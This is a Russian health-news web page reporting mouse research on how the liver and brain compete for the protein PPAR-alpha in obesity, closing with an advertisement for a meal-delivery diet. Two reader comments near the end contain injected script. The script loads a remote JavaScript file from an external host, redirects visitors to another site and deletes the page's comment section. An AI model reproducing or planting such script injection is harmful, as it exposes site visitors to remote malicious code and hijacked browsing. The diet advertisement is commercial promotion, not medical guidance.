Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваша печень сжирает ваш м...  >>  Ваша печень сжирает ваш мозг
 
Обратная связь
 

Ваша печень сжирает ваш мозг

Размер шрифта
13 января 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что печень и мозг буквальным образом конкурируют за определенный белок, и у людей с ожирением печень одерживает верх в этой борьбе. Что, конечно же, означает плохие новости для мозга и для организма в целом.

Ваша печень сжирает ваш мозг

У людей с абдоминальным типом ожирения (то есть с большим животом) в 3 раза чаще развивается деменция и проблемы с памятью, и наконец-то ученые выяснили, с чем это связано.

По всей видимости, печень и гиппокамп (участок мозга, отвечающий за память) для нормального функционирования нуждаются в одном и том же белке, который называется PPAR-альфа. Печень использует этот белок для того, чтобы сжигать жир, а гиппокамп – для регуляции процесса запоминания.

У людей с абдоминальным ожирением печень сталкивается с недюжинными проблемами: жира так много, что имеющихся у нее запасов PPAR-альфа недостаточно. Поэтому печень, израсходовав их, начинает обкрадывать другие органы, в том числе и мозг. Гиппокамп, лишившись необходимого молекулярного подспорья, отвечает закономерным образом: ухудшением памяти.

Это не первая работа, в которой изучалась связь между ожирением и высшими неврологическими функциями. Так, в 2010 году ученые из Бостонского университета (штат Массачусетс, США) опубликовали статью, из которой следовало, что чрезмерное количество абдоминального жира приводит к уменьшению функциональной площади коры больших полушарий. Однако тогда ученые не смогли объяснить патофизиологический механизм, лежащий в основе этого процесса.

Что же сделали исследователи из Иллинойса? Они вырастили мышей, дефективных по гену PPAR-альфа в различных вариациях. У одних грызунов ген нормально работал в печени, но не в мозге, и они демонстрировали снижение высших неврологических функций, в том числе памяти. У других же, напротив, ген исправно функционировал в мозге, а печень оставалась с носом, и у них с памятью все было в порядке.

При этом инъекция белка в первой группе животных приводила к заметным улучшениям когнитивных функций. Таким образом, PPAR-альфа может стать новой перспективной фармакологической мишенью в лечении болезни Альцгеймера, старческого слабоумия и возрастных нарушений памяти.

«Необходимы дальнейшие исследования, которые смогли бы пролить свет на то, можем ли мы поддерживать нужный уровень PPAR-альфа в [человеческом] мозге для сохранения памяти», – говорит Калибада Паан, глава научной группы.

Но до тех пор стоит, как минимум, похудеть.

Как раз для этого и создана «Диета Елены Малышевой». Уже правильная готовая еда будет доставлена вам в любое удобное для вас место и время. Вам останется только есть и худеть!

Данное исследование было проведено в Университете имени Бенджамина Раша (штат Иллинойс, США) и опубликовано в недавнем номере журнала Cell Reports.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Горячий шоколад защищает мозг   Это просто забывчивость, а не болезнь. 5 признаков!   Как первым увидеть в толпе звезду? У нас есть научный ответ!   Жирная еда делает вас стервой!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Как сохранить мозги в 40 лет
8 мелочей, которые помогут вам похудеть и не болеть
Как сохранить память. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.